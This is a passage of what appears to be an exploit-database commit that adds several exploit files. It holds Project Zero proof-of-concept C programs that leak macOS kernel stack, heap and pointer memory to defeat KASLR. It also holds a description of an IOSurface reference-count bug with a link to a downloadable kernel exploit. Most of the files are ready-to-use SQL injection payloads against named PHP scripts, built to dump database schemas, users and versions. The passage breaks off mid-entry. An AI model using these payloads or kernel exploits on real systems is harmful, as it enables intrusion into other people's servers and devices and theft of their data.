The following test results come from a Macmini7,1 running macOS 10.13 (17A405), Darwin 17.0.0.
Just leaking stack data from a previous syscall seems to mostly return the upper halfes of some kernel pointers.
The returned data seems to come from the previous syscall:
$ cat test.c
#include <sys/resource.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
void do_leak(void) {
static struct rusage ru;
getrusage(RUSAGE_SELF, &ru);
static unsigned int leak1, leak2;
memcpy(&leak1, ((char*)&ru)+12, 4);
memcpy(&leak1, ((char*)&ru)+28, 4);
printf("leak1: 0x%08x\n", leak1);
printf("leak2: 0x%08x\n", leak2);
}
int main(void) {
do_leak();
do_leak();
do_leak();
int fd = open("/dev/null", O_RDONLY);
do_leak();
int dummy;
read(fd, &dummy, 4);
do_leak();
return 0;
}
$ gcc -o test test.c && ./test
leak1: 0x00000000
leak2: 0x00000000
leak1: 0xffffff80
leak2: 0x00000000
leak1: 0xffffff80
leak2: 0x00000000
leak1: 0xffffff80
leak2: 0x00000000
leak1: 0xffffff81
leak2: 0x00000000
However, I believe that this can also be used to disclose kernel heap memory.
When the stack freelists are empty, stack_alloc_internal() allocates a new kernel stack
without zeroing it, so the new stack contains data from previous heap allocations.
The following testcase, when run after repeatedly reading a wordlist into memory,
leaks some non-pointer data that seems to come from the wordlist:
$ cat forktest.c
*/
#include <sys/resource.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
void do_leak(void) {
static struct rusage ru;
getrusage(RUSAGE_SELF, &ru);
static unsigned int leak1, leak2;
memcpy(&leak1, ((char*)&ru)+12, 4);
memcpy(&leak2, ((char*)&ru)+28, 4);
char str[1000];
if (leak1 != 0) {
sprintf(str, "leak1: 0x%08x\n", leak1);
write(1, str, strlen(str));
}
if (leak2 != 0) {
sprintf(str, "leak2: 0x%08x\n", leak2);
write(1, str, strlen(str));
}
}
void leak_in_child(void) {
int res_pid, res2;
asm volatile(
"mov $0x02000002, %%rax\n\t"
"syscall\n\t"
: "=a"(res_pid), "=d"(res2)
:
: "cc", "memory", "rcx", "r11"
);
//write(1, "postfork\n", 9);
if (res2 == 1) {
//write(1, "child\n", 6);
do_leak();
char dummy;
read(0, &dummy, 1);
asm volatile(
"mov $0x02000001, %rax\n\t"
"mov $0, %rdi\n\t"
"syscall\n\t"
);
}
//printf("fork=%d:%d\n", res_pid, res2);
int wait_res;
//wait(&wait_res);
}
int main(void) {
for(int i=0; i<1000; i++) {
leak_in_child();
}
}
/*
$ gcc -o forktest forktest.c && ./forktest
leak1: 0x1b3b1320
leak1: 0x00007f00
leak1: 0x65686375
leak1: 0x410a2d63
leak1: 0x8162ced5
leak1: 0x65736168
leak1: 0x0000042b
The leaked values include the strings "uche", "c-\nA" and "hase", which could plausibly come from the wordlist.
Apart from fixing the actual bug here, it might also make sense to zero stacks when stack_alloc_internal() grabs pages from the generic allocator with kernel_memory_allocate() (by adding KMA_ZERO or so). As far as I can tell, that codepath should only be executed very rarely under normal circumstances, and this change should at least break the trick of leaking heap contents through the stack.
*/

235
exploits/macos/dos/43321.c Normal file
View file

@ -0,0 +1,235 @@
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1372
the kernel libproc API proc_list_uptrs has the following comment in it's userspace header:
/*
* Enumerate potential userspace pointers embedded in kernel data structures.
* Currently inspects kqueues only.
*
* NOTE: returned "pointers" are opaque user-supplied values and thus not
* guaranteed to address valid objects or be pointers at all.
*
* Returns the number of pointers found (which may exceed buffersize), or -1 on
* failure and errno set appropriately.
This is a recent addition to the kernel, presumably as a debugging tool to help enumerate
places where the kernel is accidentally disclosing kernel pointers to userspace.
The implementation currently enumerates kqueues and dumps a bunch of values from them.
Here's the relevant code:
// buffer and buffersize are attacker controlled
int
proc_pidlistuptrs(proc_t p, user_addr_t buffer, uint32_t buffersize, int32_t *retval)
{
uint32_t count = 0;
int error = 0;
void *kbuf = NULL;
int32_t nuptrs = 0;
if (buffer != USER_ADDR_NULL) {
count = buffersize / sizeof(uint64_t); <---(a)
if (count > MAX_UPTRS) {
count = MAX_UPTRS;
buffersize = count * sizeof(uint64_t);
}
if (count > 0) {
kbuf = kalloc(buffersize); <--- (b)
assert(kbuf != NULL);
}
} else {
buffersize = 0;
}
nuptrs = kevent_proc_copy_uptrs(p, kbuf, buffersize);
if (kbuf) {
size_t copysize;
if (os_mul_overflow(nuptrs, sizeof(uint64_t), &copysize)) { <--- (c)
error = ERANGE;
goto out;
}
if (copysize > buffersize) { <-- (d)
copysize = buffersize;
}
error = copyout(kbuf, buffer, copysize); <--- (e)
}
At (a) the attacker-supplied buffersize is divided by 8 to compute the maximum number of uint64_t's
which can fit in there.
If that value isn't huge then the attacker-supplied buffersize is used to kalloc the kbuf buffer at (b).
kbuf and buffersize are then passed to kevent_proc_copy_uptrs. Looking at the implementation of
kevent_proc_copy_uptrs the return value is the total number of values it found, even if that value is larger
than the supplied buffer. If it finds more than will fit it keeps counting but no longer writes them to the kbuf.
This means that at (c) the computed copysize value doesn't reflect how many values were actually written to kbuf
but how many *could* have been written had the buffer been big enough.
If there were possible values which could have been written than there was space in the buffer then at (d) copysize
will be limited down to buffersize.
Copysize is then used at (e) to copy the contents of kbuf to userspace.
The bug is that there's no enforcement that (buffersize % 8) == 0. If we were to pass a buffersize of 15, at (a) count would be 1
as 15 bytes is only enough to store 1 complete uint64_t. At (b) this would kalloc a buffer of 15 bytes.
If the target pid actually had 10 possible values which kevent_proc_copy_uptrs finds then nuptrs will return 10 but it will
only write to the first value to kbuf, leaving the last 7 bytes untouched.
At (c) copysize will be computed at 10*8 = 80 bytes, at (d) since 80 > 15 copysize will be truncated back down to buffersize (15)
and at (e) 15 bytes will be copied back to userspace even though only 8 were written to.
Kalloc doesn't zero-initialise returned memory so this can be used to easily and safely disclose lots of kernel memory, albeit
limited to the 7-least significant bytes of each 8-byte aligned qword. That's more than enough to easily defeat kaslr.
This PoC demonstrates the disclosure of kernel pointers in the stale kalloc memory.
Tested on MacOS 10.13 High Sierra (17A365)
*/
// ianbeer
#if 0
XNU kernel memory disclosure due to bug in kernel API for detecting kernel memory disclosures
the kernel libproc API proc_list_uptrs has the following comment in it's userspace header:
/*
* Enumerate potential userspace pointers embedded in kernel data structures.
* Currently inspects kqueues only.
*
* NOTE: returned "pointers" are opaque user-supplied values and thus not
* guaranteed to address valid objects or be pointers at all.
*
* Returns the number of pointers found (which may exceed buffersize), or -1 on
* failure and errno set appropriately.
*/
This is a recent addition to the kernel, presumably as a debugging tool to help enumerate
places where the kernel is accidentally disclosing kernel pointers to userspace.
The implementation currently enumerates kqueues and dumps a bunch of values from them.
Here's the relevant code:
// buffer and buffersize are attacker controlled
int
proc_pidlistuptrs(proc_t p, user_addr_t buffer, uint32_t buffersize, int32_t *retval)
{
uint32_t count = 0;
int error = 0;
void *kbuf = NULL;
int32_t nuptrs = 0;
if (buffer != USER_ADDR_NULL) {
count = buffersize / sizeof(uint64_t); <---(a)
if (count > MAX_UPTRS) {
count = MAX_UPTRS;
buffersize = count * sizeof(uint64_t);
}
if (count > 0) {
kbuf = kalloc(buffersize); <--- (b)
assert(kbuf != NULL);
}
} else {
buffersize = 0;
}
nuptrs = kevent_proc_copy_uptrs(p, kbuf, buffersize);
if (kbuf) {
size_t copysize;
if (os_mul_overflow(nuptrs, sizeof(uint64_t), &copysize)) { <--- (c)
error = ERANGE;
goto out;
}
if (copysize > buffersize) { <-- (d)
copysize = buffersize;
}
error = copyout(kbuf, buffer, copysize); <--- (e)
}
At (a) the attacker-supplied buffersize is divided by 8 to compute the maximum number of uint64_t's
which can fit in there.
If that value isn't huge then the attacker-supplied buffersize is used to kalloc the kbuf buffer at (b).
kbuf and buffersize are then passed to kevent_proc_copy_uptrs. Looking at the implementation of
kevent_proc_copy_uptrs the return value is the total number of values it found, even if that value is larger
than the supplied buffer. If it finds more than will fit it keeps counting but no longer writes them to the kbuf.
This means that at (c) the computed copysize value doesn't reflect how many values were actually written to kbuf
but how many *could* have been written had the buffer been big enough.
If there were possible values which could have been written than there was space in the buffer then at (d) copysize
will be limited down to buffersize.
Copysize is then used at (e) to copy the contents of kbuf to userspace.
The bug is that there's no enforcement that (buffersize % 8) == 0. If we were to pass a buffersize of 15, at (a) count would be 1
as 15 bytes is only enough to store 1 complete uint64_t. At (b) this would kalloc a buffer of 15 bytes.
If the target pid actually had 10 possible values which kevent_proc_copy_uptrs finds then nuptrs will return 10 but it will
only write to the first value to kbuf, leaving the last 7 bytes untouched.
At (c) copysize will be computed at 10*8 = 80 bytes, at (d) since 80 > 15 copysize will be truncated back down to buffersize (15)
and at (e) 15 bytes will be copied back to userspace even though only 8 were written to.
Kalloc doesn't zero-initialise returned memory so this can be used to easily and safely disclose lots of kernel memory, albeit
limited to the 7-least significant bytes of each 8-byte aligned qword. That's more than enough to easily defeat kaslr.
This PoC demonstrates the disclosure of kernel pointers in the stale kalloc memory.
Tested on MacOS 10.13 High Sierra (17A365)
#endif
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#define PRIVATE
#include <libproc.h>
uint64_t try_leak(pid_t pid, int count) {
size_t buf_size = (count*8)+7;
char* buf = calloc(buf_size+1, 1);
int err = proc_list_uptrs(pid, (void*)buf, buf_size);
if (err == -1) {
return 0;
}
// the last 7 bytes will contain the leaked data:
uint64_t last_val = ((uint64_t*)buf)[count]; // we added an extra zero byte in the calloc
return last_val;
}
int main(int argc, char** argv) {
for (int pid = 0; pid < 1000; pid++) {
for (int i = 0; i < 100; i++) {
uint64_t leak = try_leak(pid, i);
/*
if (leak != 0 && leak != 0x00adbeefdeadbeef) {
printf("%016llx\n", leak);
}
*/
if ((leak & 0x00ffffff00000000) == 0xffff8000000000) {
printf("%016llx\n", leak);
}
}
}
return 0;
}

36
exploits/multiple/dos/43320.txt Normal file
View file

@ -0,0 +1,36 @@
I have previously detailed the lifetime management paradigms in MIG in the writeups for:
CVE-2016-7612 [https://bugs.chromium.org/p/project-zero/issues/detail?id=926]
and
CVE-2016-7633 [https://bugs.chromium.org/p/project-zero/issues/detail?id=954]
If a MIG method returns KERN_SUCCESS it means that the method took ownership of *all* the arguments passed to it.
If a MIG method returns an error code, then it took ownership of *none* of the arguments passed to it.
If an IOKit userclient external method takes an async wake mach port argument then the lifetime of the reference
on that mach port passed to the external method will be managed by MIG semantics. If the external method returns
an error then MIG will assume that the reference was not consumed by the external method and as such the MIG
generated coode will drop a reference on the port.
IOSurfaceRootUserClient external method 17 (s_set_surface_notify) will drop a reference on the wake_port
(via IOUserClient::releaseAsyncReference64) then return an error code if the client has previously registered
a port with the same callback function.
The external method's error return value propagates via the return value of is_io_connect_async_method back to the
MIG generated code which will drop a futher reference on the wake_port when only one was taken.
This bug is reachable from the iOS app sandbox as demonstrated by this PoC.
Tested on iOS 11.0.3 (11A432) on iPhone 6s (MKQL2CN/A)
Tested on MacOS 10.13 (17A365) on MacBookAir5,2
------------------------------------------------------
async_wake exploit attached.
Gets tfp0 on all 64-bit devices plus an initial PoC local kernel debugger.
See the README and kdbg.c for details.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43320.zip

46
exploits/php/webapps/43278.txt Normal file
View file

@ -0,0 +1,46 @@
# # # # #
# Exploit Title: Entrepreneur Dating Script 2.0.1 - SQL Injection
# Dork: N/A
# Date: 08.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/entrepreneur-dating-script/
# Demo: http://198.38.86.159/~datingscript/
# Version: 2.0.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/search_result.php?marital=[SQL]&submit
#
# -1'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51),(52),(53),(54),(55),(56),(57),(58),(59),(60),(61),(62),(63),(64),(65),(66),(67),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(69),(70),(71),(72),(73),(74),(75),(76),(77),(78),(79),(80),(81),(82),(83),(84),(85),(86),(87),(88),(89),(90),(91),(92),(93))--+-
#
#
# 2)
# http://localhost/[PATH]/search_result.php?gender=[SQL]&submit
#
# -1'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51),(52),(53),(54),(55),(56),(57),(58),(59),(60),(61),(62),(63),(64),(65),(66),(67),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(69),(70),(71),(72),(73),(74),(75),(76),(77),(78),(79),(80),(81),(82),(83),(84),(85),(86),(87),(88),(89),(90),(91),(92),(93))--+-
#
#
# 3)
# http://localhost/[PATH]/search_result.php?country=[SQL]&submit
#
# -1'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51),(52),(53),(54),(55),(56),(57),(58),(59),(60),(61),(62),(63),(64),(65),(66),(67),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(69),(70),(71),(72),(73),(74),(75),(76),(77),(78),(79),(80),(81),(82),(83),(84),(85),(86),(87),(88),(89),(90),(91),(92),(93))--+-
#
#
# 4)
# http://localhost/[PATH]/search_result.php?profileid=[SQL]&submit
#
# -1'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49),(50),(51),(52),(53),(54),(55),(56),(57),(58),(59),(60),(61),(62),(63),(64),(65),(66),(67),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(69),(70),(71),(72),(73),(74),(75),(76),(77),(78),(79),(80),(81),(82),(83),(84),(85),(86),(87),(88),(89),(90),(91),(92),(93))--+-
#
#
# # # # #

34
exploits/php/webapps/43287.txt Normal file
View file

@ -0,0 +1,34 @@
# # # # #
# Exploit Title: Secure E-commerce Script 2.0.1 - SQL Injection
# Dork: N/A
# Date: 09.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/secure-e-commerce-script/
# Version: 2.0.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/category.php?searchmain=[SQL]&searchcat=[SQL]
# http://localhost/[PATH]/single_detail.php?sid=[SQL]
#
# 1'++/*!50000UNION*/+/*!50000SELECT*/+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--+-
#
# http://server/category.php?searchmain=1'++/*!50000UNION*/+/*!50000SELECT*/+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--+-
#
# Parameter: searchmain (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: searchmain=1' AND 9950=9950 AND 'nOyB'='nOyB&searchcat=a
#
# # # # #

28
exploits/php/webapps/43288.txt Normal file
View file

@ -0,0 +1,28 @@
# # # # #
# Exploit Title: Laundry Booking Script 1.0 - SQL Injection
# Dork: N/A
# Date: 08.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/laundry-booking-script/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/list?city=[SQL]&main_search=
#
# -1'+/*!11111UNION*/+/*!11111SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53--+-&main_search=
#
# http://server/laundry-search/list?city=-1'+/*!11111UNION*/+/*!11111SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53--+-&main_search=
#
# # # # #

28
exploits/php/webapps/43289.txt Normal file
View file

@ -0,0 +1,28 @@
# # # # #
# Exploit Title: Lawyer Search Script 1.1 - SQL Injection
# Dork: N/A
# Date: 08.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/lawyer-script/
# Version: 1.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/lawyer-list?city=[SQL]&main_search=
#
# -1'+/*!11111UNION*/+/*!11111SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--+-
#
# http://server/lawyer-list?city=-1'+/*!11111UNION*/+/*!11111SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--+-&main_search=
#
# # # # #

28
exploits/php/webapps/43290.txt Normal file
View file

@ -0,0 +1,28 @@
# # # # #
# Exploit Title: Multivendor Penny Auction Clone Script 1.0 - SQL Injection
# Dork: N/A
# Date: 08.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/penny-auction-script/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/detail/[SQL]
#
# -48++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29))--+-
#
# http://server/bidding/detail/-48++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29))--+-
#
# # # # #

37
exploits/php/webapps/43291.txt Normal file
View file

@ -0,0 +1,37 @@
# # # # #
# Exploit Title: Online Exam Test Application Script 1.6 - 'Exams.php 'sort' SQL Injection
# Dork: N/A
# Date: 08.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/online-exam-test-application/
# Version: 1.6
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/exams.php?sort=[SQL]
#
# -4++UNION+ALL+SELECT+1,2,3,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,4,0x30),0x3a20,table_name,0x3c62723e))))x),5,6--+-
#
# http://server/exams.php?sort=-4++UNION+ALL+SELECT+1,2,3,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,4,0x30),0x3a20,table_name,0x3c62723e))))x),5,6--+-
#
# Parameter: sort (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: sort=4 AND 9300=9300
#
# Type: UNION query
# Title: Generic UNION query (NULL) - 6 columns
# Payload: sort=4 UNION ALL SELECT NULL,CONCAT(0x717a6b7071,0x436a5574724b7477565147546d496b47534c4e586c4275794c6359695374477874484b4669767978,0x7176627871),NULL,NULL,NULL,NULL-- Knya
#
# # # # #

29
exploits/php/webapps/43292.html Normal file
View file

@ -0,0 +1,29 @@
<!--
# # # # #
# Exploit Title: Opensource Classified Ads Script 3.2 - SQL Injection
# Dork: N/A
# Date: 09.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/professional-classified-ads-script/
# Version: 3.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
-->
<html>
<body>
<form action="http://server/advance_result.php" method="post">
<input value="1'and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND ''='" onblur="Getback(this);" onclick="doClear(this);" name="keyword" style="font-size:12px; color:#999999;" type="text">
<input name="adv_search" value="Ver Ayari" id="adv_search" type="submit"></div>
</form>
</body>
</html>

49
exploits/php/webapps/43293.txt Normal file
View file

@ -0,0 +1,49 @@
# # # # #
# Exploit Title: PHP Multivendor Ecommerce 1.0 - SQL Injection
# Dork: N/A
# Date: 09.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/php-multivendor-ecommerce/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/single_detail.php?sid=[SQL]
#
# Parameter: sid (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: sid=22 AND 4059=4059
#
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
# Payload: sid=22 AND SLEEP(5)
#
# 2)
# http://localhost/[PATH]/category.php?searchcat=[SQL]
#
# Parameter: searchcat (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: searchcat=s%' AND 4309=4309 AND '%'='
#
# 3)
# http://localhost/[PATH]/category.php?chid1=[SQL]
#
# Parameter: chid1 (GET)
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
# Payload: chid1=46' AND SLEEP(5) AND 'DzvZ'='DzvZ
#
# # # # #

28
exploits/php/webapps/43294.txt Normal file
View file

@ -0,0 +1,28 @@
# # # # #
# Exploit Title: Professional Service Script 1.0 - SQL Injection
# Dork: N/A
# Date: 09.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/professional-service-script/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/service-list?city=[SQL]&main_search=
#
# '+/*!13337UNION*/+/*!13337SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--+-
#
# http://server/service-list?city='+/*!13337UNION*/+/*!13337SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--+-&main_search=
#
# # # # #

35
exploits/php/webapps/43295.txt Normal file
View file

@ -0,0 +1,35 @@
# # # # #
# Exploit Title: Readymade PHP Classified Script 3.3 - SQL Injection
# Dork: N/A
# Date: 09.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/advance-olx-clone/
# Version: 3.3
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/categories?subctid=[SQL]
#
# -yzEb7895'++UNION+ALL+SELECT+CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())--+-
#
# http://server/categories?subctid=-yzEb7895'++UNION+ALL+SELECT+CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())--+-
#
# 2)
# http://localhost/[PATH]/categories?&mctid=[SQL]
#
# -Y12h7881'++UNION+ALL+SELECT+(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,4,0x30),0x3a20,table_name,0x3c62723e))))x)--+-
#
# http://server/categories?&mctid=-Y12h7881'++UNION+ALL+SELECT+(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,4,0x30),0x3a20,table_name,0x3c62723e))))x)--+-
#
# # # # #

35
exploits/php/webapps/43296.txt Normal file
View file

@ -0,0 +1,35 @@
# # # # #
# Exploit Title: Readymade Video Sharing Script 3.2 - SQL Injection
# Dork: N/A
# Date: 09.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/php-video-sharing-script/
# Version: 3.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/single-video-detail.php?video_id=MTMy&report_videos[]=[SQL]&report_submit=
#
# http://server/single-video-detail.php?video_id=MTMy&report_videos[]='&report_submit=
#
# Parameter: report_videos[] (GET)
# Type: boolean-based blind
# Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)
# Payload: video_id=MTMy&report_videos[]=1' AND ELT(7764=7764,9174) AND 'BZFh'='BZFh&report_submit=
#
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
